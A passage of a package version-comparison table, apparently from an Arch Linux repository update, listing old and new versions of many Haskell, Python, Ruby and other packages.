haskell-hls-alternate-number-format-plugin     2.2.0.0-16            2.3.0.0-5
        haskell-hls-cabal-fmt-plugin           2.2.0.0-16            2.3.0.0-5
            haskell-hls-cabal-plugin           2.2.0.0-16            2.3.0.0-5
   haskell-hls-call-hierarchy-plugin           2.2.0.0-16            2.3.0.0-5
haskell-hls-change-type-signature-plugin       2.2.0.0-16            2.3.0.0-5
            haskell-hls-class-plugin           2.2.0.0-16            2.3.0.0-5
       haskell-hls-code-range-plugin           2.2.0.0-16            2.3.0.0-5
             haskell-hls-eval-plugin           2.2.0.0-16            2.3.0.0-5
  haskell-hls-explicit-fixity-plugin           2.2.0.0-16            2.3.0.0-5
 haskell-hls-explicit-imports-plugin           2.2.0.0-16            2.3.0.0-5
haskell-hls-explicit-record-fields-plugin      2.2.0.0-16            2.3.0.0-5
         haskell-hls-floskell-plugin           2.2.0.0-16            2.3.0.0-5
         haskell-hls-fourmolu-plugin           2.2.0.0-17            2.3.0.0-5
             haskell-hls-gadt-plugin           2.2.0.0-17            2.3.0.0-5
                   haskell-hls-graph           2.2.0.0-12            2.3.0.0-4
            haskell-hls-hlint-plugin           2.2.0.0-16            2.3.0.0-5
      haskell-hls-module-name-plugin           2.2.0.0-16            2.3.0.0-5
           haskell-hls-ormolu-plugin           2.2.0.0-16            2.3.0.0-5
haskell-hls-overloaded-record-dot-plugin       2.2.0.0-16            2.3.0.0-5
              haskell-hls-plugin-api           2.2.0.0-15            2.3.0.0-4
          haskell-hls-pragmas-plugin           2.2.0.0-16            2.3.0.0-5
haskell-hls-qualify-imported-names-plugin      2.2.0.0-16            2.3.0.0-5
         haskell-hls-refactor-plugin           2.2.0.0-17            2.3.0.0-5
           haskell-hls-rename-plugin           2.2.0.0-17            2.3.0.0-5
           haskell-hls-retrie-plugin           2.2.0.0-17            2.3.0.0-5
           haskell-hls-splice-plugin           2.2.0.0-17            2.3.0.0-5
  haskell-hls-stylish-haskell-plugin           2.2.0.0-16            2.3.0.0-5
              haskell-hls-test-utils           2.2.0.0-16            2.3.0.0-5
                     haskell-hoauth2            2.14.0-16            2.14.0-19
                    haskell-hopenpgp           2.10.1-121           2.10.1-124
                       haskell-hpack            0.38.0-21            0.38.0-24
                       haskell-hslua            2.3.0-203            2.3.0-206
                 haskell-hslua-aeson           2.3.1.1-51           2.3.1.1-54
               haskell-hslua-classes             2.3.1-30             2.3.1-31
                  haskell-hslua-core             2.3.2-34             2.3.2-35
                  haskell-hslua-list             1.1.4-29             1.1.4-30
           haskell-hslua-marshalling            2.3.1-141            2.3.1-142
      haskell-hslua-module-doclayout             1.2.0-11             1.2.0-14
           haskell-hslua-module-path            1.1.1-105            1.1.1-108
         haskell-hslua-module-system             1.1.2-54             1.1.2-55
           haskell-hslua-module-text          1.1.0.1-168          1.1.0.1-169
        haskell-hslua-module-version            1.1.1-147            1.1.1-150
            haskell-hslua-module-zip             1.1.3-47             1.1.3-48
     haskell-hslua-objectorientation             2.3.1-49             2.3.1-50
             haskell-hslua-packaging            2.3.1-151            2.3.1-152
                  haskell-hslua-repl            0.1.2-147            0.1.2-148
                haskell-hslua-typing            0.1.1-143            0.1.1-144
                   haskell-hspec-wai           0.11.1-639           0.11.1-642
              haskell-hspec-wai-json           0.11.0-710           0.11.0-713
                haskell-hsyaml-aeson           0.2.0.2-58           0.2.0.2-60
                         haskell-htf          0.15.0.2-68          0.15.0.2-70
                haskell-html-conduit          1.3.2.2-388          1.3.2.2-390
                        haskell-http         4000.4.1-398         4000.4.1-401
                 haskell-http-client            0.7.19-58            0.7.19-60
      haskell-http-client-restricted            0.1.0-198            0.1.0-201
             haskell-http-client-tls          0.3.6.4-137          0.3.6.4-140
                haskell-http-conduit          2.3.9.1-197          2.3.9.1-200
               haskell-http-download          0.2.1.0-327          0.2.1.0-330
                haskell-http-streams          0.8.9.9-292          0.8.9.9-295
                       haskell-http2             5.1.0-17             5.1.0-19
                       haskell-http3             0.0.9-21             0.0.9-23
                  haskell-httpd-shed          0.4.1.2-108          0.4.1.2-109
               haskell-hw-fingertree          0.1.2.1-194          0.1.2.1-196
           haskell-hw-hspec-hedgehog          0.1.1.1-213          0.1.1.1-215
                     haskell-hw-prim          0.6.3.2-213          0.6.3.2-215
                         haskell-hxt         9.3.1.22-234         9.3.1.22-235
                haskell-implicit-hie           0.1.4.0-78           0.1.4.0-80
         haskell-implicit-hie-cradle          0.5.0.1-192          0.5.0.1-194
          haskell-incremental-parser            0.5.1-166            0.5.1-167
   haskell-insert-ordered-containers          0.2.5.3-200          0.2.5.3-203
                 haskell-interpolate            0.2.1-468            0.2.1-469
    haskell-interpolatedstring-perl6            1.0.2-405            1.0.2-406
                   haskell-invariant             0.6.4-94             0.6.4-95
                       haskell-ipynb              0.2-283              0.2-285
              haskell-ipython-kernel           0.12.0.0-8          0.12.0.0-10
           haskell-isomorphism-class             0.1.1-92             0.1.1-94
                 haskell-ixset-typed          0.5.1.0-314          0.5.1.0-316
                        haskell-jose             0.10-256             0.10-259
                   haskell-js-jquery            3.7.1-107            3.7.1-110
              haskell-kan-extensions             5.2.7-85             5.2.7-87
                        haskell-keys             3.12.5-5             3.12.5-6
                    haskell-kvitable            1.1.1.1-7           1.1.1.1-10
           haskell-lambdabot-trusted          5.3.1.2-244          5.3.1.2-247
                  haskell-lambdahack         0.11.0.1-190         0.11.0.1-193
             haskell-language-server           2.2.0.0-19            2.3.0.0-5
                    haskell-lattices             2.2.1-96             2.2.1-97
                        haskell-lens              5.3.4-1              5.3.4-3
                 haskell-lens-action            0.2.6-329            0.2.6-331
                  haskell-lens-aeson            1.2.3-202            1.2.3-205
                     haskell-libyaml            0.1.4-161            0.1.4-163
                      haskell-linear            1.23.2-47            1.23.2-49
                      haskell-list-t           1.0.5.7-63           1.0.5.7-65
                    haskell-lrucache           1.2.0.1-26           1.2.0.1-27
                         haskell-lsp           2.2.0.0-10           2.2.0.0-13
                    haskell-lsp-test          0.16.0.0-11          0.16.0.0-14
                   haskell-lsp-types            2.0.2.0-9           2.0.2.0-12
               haskell-lua-arbitrary          1.0.1.1-135            1.0.1.2-1
                  haskell-lumberjack          1.0.3.0-172          1.0.3.0-173
                  haskell-microaeson           0.1.0.3-43           0.1.0.3-45
             haskell-microlens-aeson            2.5.2-151            2.5.2-153
                 haskell-microstache          1.0.2.3-212          1.0.2.3-214
                  haskell-mime-types            0.1.2.0-4            0.1.2.1-1
                       haskell-mmark          0.0.7.6-346          0.0.7.6-348
                         haskell-mod           0.2.1.0-30           0.2.1.0-32
                  haskell-modern-uri          0.3.6.1-147          0.3.6.1-148
              haskell-monad-dijkstra          0.1.1.5-193          0.1.1.5-195
                haskell-monad-logger           0.3.42-113           0.3.42-115
            haskell-mono-traversable         1.0.21.0-135         1.0.21.0-137
  haskell-mono-traversable-instances          0.1.1.0-386          0.1.1.0-389
                    haskell-mustache           2.4.3.1-72           2.4.3.1-76
          haskell-mutable-containers          0.3.4.1-242          0.3.4.1-244
                  haskell-named-text           1.2.2.0-13           1.2.2.0-16
          haskell-neat-interpolation          0.5.1.4-199          0.5.1.4-201
                 haskell-network-uri          2.6.4.2-137          2.6.4.2-138
                        haskell-oeis           0.3.10.2-6           0.3.10.2-9
                   haskell-one-liner              2.1.1-2              2.1.1-3
             haskell-optparse-simple          0.1.1.4-535          0.1.1.4-538
                      haskell-ormolu           0.6.0.0-13           0.6.0.0-15
                       haskell-pager          0.1.1.0-218          0.1.1.0-220
                      haskell-pandoc               3.5-12                3.6-2
           haskell-pandoc-lua-engine             0.3.3-14                0.4-2
          haskell-pandoc-lua-marshal             0.2.9-15              0.3.0-1
               haskell-pandoc-server           0.1.0.10-3           0.1.0.10-9
                haskell-pandoc-types           1.23.1-164           1.23.1-166
                      haskell-pantry           0.8.2.2-32           0.8.2.2-36
         haskell-parameterized-utils           2.1.11.0-9          2.1.11.0-12
                        haskell-path              0.9.6-9             0.9.6-11
                     haskell-path-io            1.8.2-140            1.8.2-142
                  haskell-persistent          2.14.5.2-58          2.14.5.2-61
            haskell-persistent-mysql         2.13.1.5-100         2.13.1.5-103
       haskell-persistent-postgresql          2.13.5.2-24          2.13.5.2-27
               haskell-persistent-qq          2.12.0.7-73          2.12.0.7-76
           haskell-persistent-sqlite          2.13.1.1-66          2.13.1.1-69
             haskell-persistent-test         2.13.1.3-208         2.13.1.3-211
                  haskell-pipes-http            1.0.6-770            1.0.6-773
                     haskell-pointed            5.0.5-125            5.0.5-127
           haskell-postgresql-binary           0.12.5-267           0.12.5-270
           haskell-postgresql-simple          0.6.5.1-112          0.6.5.1-114
        haskell-prettyprinter-interp          0.2.0.0-157          0.2.0.0-158
                   haskell-prim-uniq              0.2-250              0.2-252
            haskell-primitive-extras         0.10.2.2-131         0.10.2.2-134
                 haskell-profunctors             5.6.3-82             5.6.3-83
            haskell-project-template          0.2.1.0-508          0.2.1.0-510
                         haskell-ptr         0.16.8.7-128         0.16.8.7-130
                        haskell-quic             0.1.27-3             0.1.27-5
          haskell-quickcheck-classes          0.6.5.0-342          0.6.5.0-344
                         haskell-ral             0.2.2-54             0.2.2-56
                      haskell-rebase            1.20.2-14            1.20.2-16
                   haskell-recaptcha          0.1.0.4-379          0.1.0.4-382
           haskell-recursion-schemes            5.2.3-141            5.2.3-142
                    haskell-reducers           3.12.5-125           3.12.5-126
                    haskell-refinery          0.4.0.0-317          0.4.0.0-318
                         haskell-req            3.13.4-32            3.13.4-35
                        haskell-rere           0.2.0.2-13           0.2.0.2-15
                    haskell-rerebase            1.20.2-14            1.20.2-16
                      haskell-retrie            1.2.3-159            1.2.3-161
                 haskell-rio-orphans          0.1.2.0-486          0.1.2.0-488
             haskell-rio-prettyprint           0.1.8.0-69           0.1.8.0-71
                   haskell-row-types           1.0.1.2-66           1.0.1.2-68
                    haskell-safecopy          0.10.4.3-57          0.10.4.3-59
                       haskell-sandi              0.5-597              0.5-599
                    haskell-sandwich           0.2.2.0-20           0.2.2.0-22
                      haskell-scotty             0.22-203             0.22-206
                        haskell-sdl2          2.5.5.1-128          2.5.5.1-131
                    haskell-sdl2-ttf            2.1.3-278            2.1.3-281
                   haskell-semialign             1.3.1-58             1.3.1-59
               haskell-semigroupoids              6.0.2-3              6.0.2-4
                   haskell-serialise          0.2.6.1-174          0.2.6.1-176
                     haskell-servant          0.20.3.0-52          0.20.3.0-54
              haskell-servant-client          0.20.3.0-67          0.20.3.0-71
         haskell-servant-client-core          0.20.3.0-52          0.20.3.0-54
              haskell-servant-server          0.20.3.0-67          0.20.3.0-70
             haskell-servant-swagger            1.2.1-153            1.2.1-156
                       haskell-shake           0.19.6-387           0.19.6-390
                 haskell-shakespeare             2.1.7-14            2.1.7.1-2
             haskell-simple-sendfile           0.2.32-196           0.2.32-198
                 haskell-skylighting             0.14.4-3             0.14.4-5
            haskell-skylighting-core             0.14.4-3             0.14.4-5
     haskell-skylighting-format-ansi              0.1-293              0.1-295
haskell-skylighting-format-blaze-html         0.1.1.3-147          0.1.1.3-149
  haskell-skylighting-format-context          0.1.0.2-257          0.1.0.2-259
    haskell-skylighting-format-latex              0.1-292              0.1-294
                   haskell-snap-core          1.0.5.1-210          1.0.5.1-211
                 haskell-snap-server          1.1.2.1-362          1.1.2.1-365
                   haskell-sourcemap            0.1.7-299            0.1.7-301
                    haskell-src-meta            0.8.15-90            0.8.15-91
                  haskell-statistics           0.16.4.0-9          0.16.4.0-11
        haskell-status-notifier-item            0.3.2.0-2            0.3.2.0-5
              haskell-stm-containers          1.2.1.1-160          1.2.1.1-164
                    haskell-stm-hamt          1.2.1.1-132              1.2.2-3
                       haskell-store           0.7.20-137           0.7.20-139
                     haskell-streams            3.3.3-125            3.3.3-127
                 haskell-strict-list          0.1.7.6-132          0.1.7.6-134
          haskell-string-interpolate          0.3.4.0-143          0.3.4.0-144
                  haskell-structured            0.1.1-319            0.1.1-321
                    haskell-summoner            2.1.0.0-2            2.1.0.0-6
                haskell-summoner-tui            2.1.0.0-2            2.1.0.0-6
                    haskell-swagger2            2.8.10-98           2.8.10-101
           haskell-tagstream-conduit            0.5.6-536            0.5.6-538
haskell-tamarin-prover-accountability            1.12.0-6             1.12.0-8
       haskell-tamarin-prover-export             1.12.0-6             1.12.0-8
        haskell-tamarin-prover-sapic             1.12.0-6             1.12.0-8
         haskell-tamarin-prover-term             1.12.0-6             1.12.0-8
       haskell-tamarin-prover-theory             1.12.0-6             1.12.0-8
        haskell-tamarin-prover-utils             1.12.0-6             1.12.0-8
                 haskell-tar-conduit            0.4.1-191            0.4.1-193
             haskell-tasty-checklist           1.0.8.0-10           1.0.8.0-13
                 haskell-tasty-hslua            1.1.1-139            1.1.1-140
                   haskell-tasty-lua           1.1.1.1-72           1.1.1.1-73
                 haskell-tasty-sugar           2.2.2.1-85           2.2.2.1-88
                     haskell-tdigest            0.3.1-150            0.3.1-152
                     haskell-texmath         0.12.8.11-15          0.12.8.12-1
                haskell-text-builder            0.6.7-283            0.6.7-285
            haskell-text-builder-dev          0.3.3.2-244          0.3.3.2-246
                   haskell-th-compat             0.1.6-87              0.1.7-1
                  haskell-th-desugar               1.16-3               1.16-4
                      haskell-th-env            0.1.1-164            0.1.1-165
                  haskell-th-orphans            0.13.17-4            0.13.17-5
                haskell-th-utilities          0.2.5.2-102          0.2.5.2-103
                         haskell-tls             2.0.6-71             2.0.6-73
         haskell-tls-session-manager             0.0.6-21             0.0.6-23
                   haskell-tree-diff          0.3.0.1-229              0.3.1-3
                    haskell-trifecta            2.1.4-174            2.1.4-176
                      haskell-turtle            1.6.2-161            1.6.2-162
                       haskell-typst               0.6-19              0.6.1-1
               haskell-typst-symbols              0.1.6-2              0.1.7-1
        haskell-uri-bytestring-aeson          0.1.0.9-133          0.1.0.9-135
                  haskell-uri-encode          1.5.0.7-319          1.5.0.7-320
                         haskell-vec             0.5.1-52             0.5.1-54
           haskell-vector-algorithms          0.9.1.0-123          0.9.1.0-125
              haskell-vector-builder          0.3.8.6-139          0.3.8.6-141
            haskell-vector-instances             3.4.3-77             3.4.3-79
                haskell-vector-sized            1.6.1-155            1.6.1-157
            haskell-wai-app-file-cgi            3.1.11-20            3.1.11-23
              haskell-wai-app-static            3.1.9-233            3.1.9-236
                 haskell-wai-conduit          3.0.0.4-714          3.0.0.4-716
                   haskell-wai-extra            3.1.18-41            3.1.18-44
          haskell-wai-handler-launch          3.0.3.1-811          3.0.3.1-814
             haskell-wai-http2-extra            0.1.3-376            0.1.3-379
       haskell-wai-middleware-static            0.9.3-192            0.9.3-195
                        haskell-warp             3.4.0-19             3.4.0-22
                   haskell-warp-quic            0.0.0-435            0.0.0-438
                    haskell-warp-tls            3.4.9-191            3.4.9-194
                       haskell-weigh           0.0.18-122           0.0.18-124
                       haskell-what4               1.6-78               1.6-81
                   haskell-wide-word           0.1.8.1-33           0.1.8.1-35
                   haskell-with-utf8          1.1.0.0-131          1.1.0.0-132
            haskell-wl-pprint-extras          3.5.0.5-560          3.5.0.5-561
          haskell-wl-pprint-terminfo          3.7.1.4-560          3.7.1.4-561
                        haskell-wreq            0.5.4.4-3            0.5.4.4-7
                        haskell-wuss           2.0.1.6-31           2.0.1.6-33
                      haskell-xcffib             1.6.1-14             1.6.1-15
           haskell-xdg-desktop-entry            0.1.1.3-2            0.1.1.3-3
                 haskell-xml-conduit          1.9.1.4-150          1.9.1.4-152
                  haskell-xml-hamlet            0.5.0.3-8           0.5.0.3-11
                      haskell-xmlgen          0.6.2.2-191          0.6.2.2-192
                haskell-xss-sanitize          0.3.7.2-131          0.3.7.2-132
                        haskell-yaml        0.11.11.2-205        0.11.11.2-207
                       haskell-yesod          1.6.2.1-460          1.6.2.1-464
                  haskell-yesod-auth         1.6.11.3-282         1.6.11.3-286
                  haskell-yesod-core         1.6.27.1-115         1.6.27.1-119
                  haskell-yesod-form            1.7.9.2-2            1.7.9.2-6
            haskell-yesod-persistent          1.6.0.8-520          1.6.0.8-524
                haskell-yesod-static          1.6.1.0-979          1.6.1.0-983
                  haskell-yesod-test           1.6.23-134           1.6.23-138
                           hedgewars             1.0.3-19             1.0.3-21
                               hefur               1.0-35               1.0-36
                               hepmc              3.3.1-7              3.3.1-8
                          hepmc-docs              3.3.1-7              3.3.1-8
                             hindent              6.1.1-6              6.1.1-8
                               hiprt      3.1.0.cb09c56-2      3.1.0.cb09c56-3
                             hledger               1.52-6              1.52-10
                        hledger-iadd            1.3.22-17            1.3.22-19
                          hledger-ui               1.52-7              1.52-11
                         hledger-web              1.52-10              1.52-14
                               hlint              3.6.1-8             3.6.1-10
                              hoogle         5.0.18.4-265         5.0.18.4-268
                      hopenpgp-tools           0.23.11-40           0.23.11-44
              hsa-amd-aqlprofile-bin              7.1.0-1              7.1.0-2
                           hslua-cli             1.4.3-87             1.4.3-88
                       i3status-rust             0.36.0-1             0.36.1-1
                               iaito              5.9.9-1              6.1.2-1
                      ibus-libpinyin             1.16.0-4             1.16.1-1
                               idris            1.3.4-478            1.3.4-481
                            ihaskell           0.13.0.0-9          0.13.0.0-12
                               incus             6.22.0-1             6.23.0-1
                         incus-tools             6.22.0-1             6.23.0-1
                              jasper              4.2.8-1              4.2.9-1
                          jasper-doc              4.2.8-1              4.2.9-1
                     jellyfin-ffmpeg          1:7.1.3p3-2          1:7.1.3p4-1
                                jolt              1.2.0-2              1.2.0-3
                               kicad             10.0.0-1             10.0.0-2
                          kitinerary            25.12.3-2            25.12.3-3
                              kmonad             0.4.4-89             0.4.4-91
                       kosmindoormap            25.12.3-1            25.12.3-2
                   libedataserverui4             3.58.3-1             3.58.3-2
                               libhx                5.3-1                5.4-1
              libperconaserverclient            8.4.8_8-1            8.4.8_8-2
                      libphonenumber           1:9.0.27-1           1:9.0.27-2
                            libsbsms              2.3.0-5              2.3.0-6
                           libsigrok             0.5.2-25             0.5.2-26
                           libtg_owt    0.git33.26068e2-1    0.git33.26068e2-2
                              libvlc             3.0.22-1             3.0.22-2
                              libvpx             1.16.0-2             1.16.0-3
                      libwireplumber             0.5.13-2             0.5.14-1
                              libwmf             0.2.13-4             0.2.14-1
                              libxdp              1.6.2-1              1.6.3-1
                          lincity-ng             2.14.2-2             2.14.2-3
                           lostfiles               4.14-1               4.15-1
                        lua-luarocks             3.13.0-4             3.13.0-5
                      lua51-luarocks             3.13.0-4             3.13.0-5
                      lua52-luarocks             3.13.0-4             3.13.0-5
                      lua53-luarocks             3.13.0-4             3.13.0-5
                      lua54-luarocks             3.13.0-4             3.13.0-5
                              luajit2.1.1774638290+fbb36bb-12.1.1774896198+18b087c-1
                            luarocks             3.13.0-4             3.13.0-5
                                mako             1.10.0-1             1.11.0-1
                              marble            25.12.3-1            25.12.3-2
                       marble-behaim            25.12.3-1            25.12.3-2
                       marble-common            25.12.3-1            25.12.3-2
                         marble-maps            25.12.3-1            25.12.3-2
                           marble-qt            25.12.3-1            25.12.3-2
                              maxima             5.49.0-7             5.49.0-8
                          maxima-ecl             5.49.0-7             5.49.0-8
                          maxima-fas             5.49.0-7             5.49.0-8
                         maxima-sbcl             5.49.0-7             5.49.0-8
                             melange             0.46.1-1             0.47.0-1
                          merkaartor            0.20.0-20            0.20.0-21
                               mgard              1.6.0-5              1.6.0-6
                           mighttpd2             4.0.4-25             4.0.4-28
                            migraphx              7.2.0-1              7.2.0-2
                           miniupnpd              2.3.9-2             2.3.10-1
                                mise           2026.3.8-1          2026.3.17-1
                               mixxx              2.5.4-2              2.5.4-3
                     mkdocs-material              9.7.5-1              9.7.6-1
                                moor             2.11.1-1             2.12.0-1
                                mosh             1.4.0-28             1.4.0-29
                           mosquitto             2.0.22-2              2.1.2-1
                              mumble            1.5.857-5            1.5.857-6
                       mumble-server            1.5.857-5            1.5.857-6
                              nageru              2.3.2-2              2.3.2-3
                                ncnn           20260113-3           20260113-4
                               ndctl                 82-1                 83-1
                             neovide             0.15.2-2             0.16.0-1
                              neovim             0.11.6-1             0.11.7-1
                             netdata              2.9.0-1              2.9.0-2
               netfilter-fullconenat      r73.0cf3b48-503      r73.0cf3b48-504
                    nextcloud-client           2:33.0.0-1           2:33.0.1-1
                             ngspice               45.2-2                 46-1
                              nickel             1.16.0-2             1.16.0-3
                         nickel-docs             1.16.0-2             1.16.0-3
              nickel-language-server             1.16.0-2             1.16.0-3
                         nodejs-yaml              2.3.1-1              2.3.2-1
                   npm-check-updates             19.5.0-1             19.6.0-1
                                nrpe              4.1.1-1              4.1.2-1
                              nsjail               3.4-22               3.4-23
                              ollama             0.18.3-1             0.19.0-1
                         ollama-cuda             0.18.3-1             0.19.0-1
                         ollama-docs             0.18.3-1             0.19.0-1
                         ollama-rocm             0.18.3-1             0.19.0-1
                       ollama-vulkan             0.18.3-1             0.19.0-1
                                onnx           1:1.20.1-1           1:1.20.1-2
                     onnxruntime-cpu             1.24.4-3             1.24.4-4
                    onnxruntime-cuda             1.24.4-3             1.24.4-4
                onnxruntime-opt-cuda             1.24.4-3             1.24.4-4
                onnxruntime-opt-rocm             1.24.4-3             1.24.4-4
                    onnxruntime-rocm             1.24.4-3             1.24.4-4
                   open-policy-agent             1.15.0-1             1.15.1-1
                            opencode              1.3.3-1              1.3.8-1
                              opencv             4.13.0-3             4.13.0-4
                         opencv-cuda             4.13.0-3             4.13.0-4
                      opencv-samples             4.13.0-3             4.13.0-4
                             openrgb             1.0rc2-5             1.0rc2-6
                          pandoc-cli               3.5-18                3.6-2
                     pandoc-crossref           0.3.19-182           0.3.19-188
                         pandoc-plot            1.9.1-256            1.9.1-263
                         pandora_box             0.20.0-1             0.20.1-1
                            paraview             6.0.1-10             6.0.1-11
                            pd-sfizz             1.2.3-12             1.2.3-13
                      percona-server            8.4.8_8-1            8.4.8_8-2
              percona-server-clients            8.4.8_8-1            8.4.8_8-2
             perl-business-isbn-data       20260325.001-1       20260328.001-1
                         perl-libwww               6.81-2               6.82-1
                     perl-xml-parser               2.48-1               2.49-1
                            php-grpc             1.78.1-2             1.80.0-1
                     php-legacy-grpc             1.78.1-2             1.80.0-1
                     platformio-core             6.1.19-1             6.1.19-3
                platformio-core-udev             6.1.19-1             6.1.19-3
                      podman-desktop             1.25.1-1             1.26.2-1
                           postgrest           10.0.0-532             10.1.0-2
                            protobuf               33.1-4               34.1-1
                          protobuf-c              1.5.2-8              1.5.2-9
                      proton-vpn-cli              0.1.7-1              0.1.8-1
                  proton-vpn-gtk-app             4.15.0-1             4.15.1-1
                   protonmail-bridge             3.23.1-1             3.23.1-2
              protonmail-bridge-core             3.23.1-1             3.23.1-2
                        prusa-slicer              2.9.4-7              2.9.4-8
                           pt2-clone               1.85-1               1.87-1
                     python-cairosvg              2.8.2-1              2.9.0-1
                 python-cinderclient              9.7.0-1              9.8.0-1
                   python-cloudflare             2.15.1-1             2.16.0-1
               python-configargparse              1.7.3-1              1.7.4-1
                    python-curl_cffi             0.14.0-6             0.14.0-7
                     python-deepdiff              8.1.1-1              8.2.0-1
                     python-eth-hash              0.7.1-1              0.8.0-1
                        python-faker             40.9.0-1            40.10.0-1
                  python-fastnumbers              5.1.1-2              5.1.1-3
                     python-flasgger            0.9.7.1-7                    -
                python-flask-restful             0.3.10-6                    -
                        python-gdstk             0.9.46-1             0.9.47-1
     python-googleapis-common-protos             1.73.0-1             1.73.1-1
                       python-grpcio             1.78.1-2             1.80.0-1
                 python-grpcio-tools             1.78.1-2             1.80.0-1
                     python-identify             2.6.17-1             2.6.18-2
           python-importlib-metadata              8.7.1-3              9.0.0-1
                  python-json-logger              4.0.0-1              4.1.0-1
                         python-lmdb              2.1.1-1              2.2.0-1
                      python-mockito              2.0.0-1              2.0.1-1
                     python-narwhals             2.18.0-1             2.18.1-1
                        python-numpy              2.4.3-1              2.4.4-1
                         python-onnx           1:1.20.1-1           1:1.20.1-2
              python-onnxruntime-cpu             1.24.4-3             1.24.4-4
             python-onnxruntime-cuda             1.24.4-3             1.24.4-4
         python-onnxruntime-opt-cuda             1.24.4-3             1.24.4-4
         python-onnxruntime-opt-rocm             1.24.4-3             1.24.4-4
             python-onnxruntime-rocm             1.24.4-3             1.24.4-4
                       python-opencv             4.13.0-3             4.13.0-4
                  python-opencv-cuda             4.13.0-3             4.13.0-4
              python-openstackclient              8.0.0-1              8.1.0-1
                 python-openstacksdk              4.4.0-2              4.5.0-1
                       python-orjson             3.11.7-1             3.11.7-2
                    python-oslo-i18n              6.7.1-1              6.7.2-1
                      python-plexapi             4.18.0-1             4.18.1-1
                      python-protego              0.4.0-1              0.5.0-1
                     python-protobuf               33.1-4               34.1-1
          python-proton-vpn-api-core             4.16.0-1             4.17.2-1
                 python-pychromecast             14.0.9-4            14.0.10-1
                python-pydantic-core           3:2.41.5-3           3:2.41.5-4
                       python-pygit2             1.19.1-2             1.19.2-1
                     python-pypandoc             1.16.2-1               1.17-1
                     python-pypubsub             4.0.3-11              4.0.4-1
                       python-pysdl3           0.9.10b0-1           0.9.11b0-1
                      python-pytorch             2.10.0-3             2.10.0-4
                 python-pytorch-cuda             2.10.0-3             2.10.0-4
                  python-pytorch-opt             2.10.0-3             2.10.0-4
             python-pytorch-opt-cuda             2.10.0-3             2.10.0-4
             python-pytorch-opt-rocm             2.10.0-3             2.10.0-4
                 python-pytorch-rocm             2.10.0-3             2.10.0-4
                        python-regex          2026.2.28-1          2026.3.32-1
                     python-requests             2.32.5-4             2.33.1-1
              python-setuptools-rust             1.12.0-3             1.12.1-1
                        python-sybil              6.1.1-2              7.0.0-1
                    python-testtools              2.8.3-2              2.8.4-1
                      python-textual              8.1.1-1              8.2.1-1
                        python-tomli              2.4.0-1              2.4.1-1
                          python-tox             4.32.0-1             4.33.0-1
                       python-triton              3.5.1-3              3.5.1-4
                        python-urwid              3.0.5-1              4.0.0-1
                   python-validators             0.30.0-1             0.31.0-1
                        python-w3lib              2.3.0-2              2.3.1-1
                     python-werkzeug              3.1.5-1              3.1.6-1
                    python-z3-solver             4.15.4-2             4.16.0-1
                                qgis              4.0.0-1              4.0.0-2
                            qt6-grpc             6.11.0-1             6.11.0-2
                          quickshell              0.2.1-5              0.2.1-6
                           qwen-code             0.13.1-1             0.13.2-1
                            r2ghidra              5.9.8-1              6.1.2-1
                             radare2              5.9.8-1              6.1.2-1
                               razor               2.86-3               2.87-2
                                 re2       2:2025.11.05-1       2:2025.11.05-3
                              reaper               7.66-1               7.67-1
                               rizin              0.8.1-2              0.8.2-1
                               rocal              7.2.0-1              7.2.0-2
                          rofi-emoji              4.1.0-2              4.1.0-3
                          rpi-imager              2.0.6-2              2.0.6-3
                          rubberband              4.0.0-1              4.0.0-2
                   rubberband-ladspa              4.0.0-1              4.0.0-2
                      rubberband-lv2              4.0.0-1              4.0.0-2
                     rubberband-vamp              4.0.0-1              4.0.0-2
                    ruby-addressable              2.8.8-1              2.8.9-1
                          ruby-async             2.34.0-1             2.38.1-1
                ruby-async-container             0.31.0-1             0.34.4-1
                     ruby-async-pool             0.11.1-1             0.11.2-1
                  ruby-async-service             0.19.1-1             0.21.0-1
                     ruby-chef-utils            19.2.27-1            19.2.32-1
                ruby-google-protobuf               33.1-4               34.1-1
                           ruby-grpc             1.78.1-1             1.80.0-1
                       ruby-io-event             1.14.2-1             1.14.5-1
                         ruby-loofah             2.25.0-1             2.25.1-1
                            ruby-lsp             0.26.6-1             0.26.9-1
                       ruby-maxitest              6.1.0-1              6.2.0-1
            ruby-net-http-persistent              4.0.7-1              4.0.8-1
                  ruby-protocol-http             0.59.0-1             0.60.0-1
                  ruby-protocol-rack             0.21.1-1             0.22.0-1
                  ruby-public_suffix              7.0.2-1              7.0.5-1
           ruby-rails-html-sanitizer              1.6.2-3              1.7.0-1
            ruby-repl_type_completor             0.1.13-1             0.1.15-1
                         ruby-sequel             5.99.0-1            5.101.0-1
                 ruby-sorbet-runtime          0.6.12942-1          0.6.13068-1
                        ruby-sqlite3              2.9.1-1              2.9.2-1
        ruby-sus-fixtures-async-http             0.12.0-1             0.12.1-1
                       ruby-zeitwerk              2.7.3-1              2.7.5-1
                      rustypaste-cli              0.9.4-1              0.9.5-1
                           rz-cutter              2.4.1-5              2.4.1-6
                                sbcl              2.6.2-1              2.6.3-1
                           scap-dkms             0.20.0-9             0.23.1-1
                             scummvm           2026.1.0-1           2026.2.0-1
                          sentry-cli              3.3.4-1              3.3.5-1
                       sentry-native             0.13.3-1             0.13.4-1
                               sfizz              1.2.3-8             1.2.3-10
                           sfizz-lib              1.2.3-8             1.2.3-10
                           sfizz-lv2             1.2.3-12             1.2.3-13
                    sfizz-standalone              1.2.3-8             1.2.3-10
                            sfizz-ui             1.2.3-12             1.2.3-13
                          sfizz-vst3             1.2.3-12             1.2.3-13
                         shadowsocks    3.0.0a.20180219-9                    -
                          shellcheck            0.11.0-79            0.11.0-81
                            skaffold             2.18.0-1             2.18.2-1
                                skim              4.0.1-1              4.2.0-1
                         slicer-udev              2.9.4-7              2.9.4-8
                            smplayer             25.6.0-1             25.6.0-2
                            soapyuhd             0.4.1-14             0.4.1-15
                      spotify-player             0.22.1-1             0.23.0-1
                           sqlcipher             4.13.0-1             4.14.0-1
                            sqlfluff              4.0.4-2              4.1.0-1
                             sslscan              2.2.1-1              2.2.2-1
                               stack          2.9.3.1-118          2.9.3.1-123
                             step-ca             0.29.0-1             0.30.2-1
                          strongswan              6.0.4-2              6.0.5-1
                             stumpwm              24.11-9             24.11-10
                     stylish-haskell          0.14.5.0-11          0.14.5.0-13
                               swtpm             0.10.1-1             0.10.1-2
                                 syd             3.51.0-1             3.51.2-1
                           syslog-ng             4.11.0-1             4.11.0-2
                      syslog-ng-amqp             4.11.0-1             4.11.0-2
                    syslog-ng-geoip2             4.11.0-1             4.11.0-2
                     syslog-ng-kafka             4.11.0-1             4.11.0-2
                   syslog-ng-mongodb             4.11.0-1             4.11.0-2
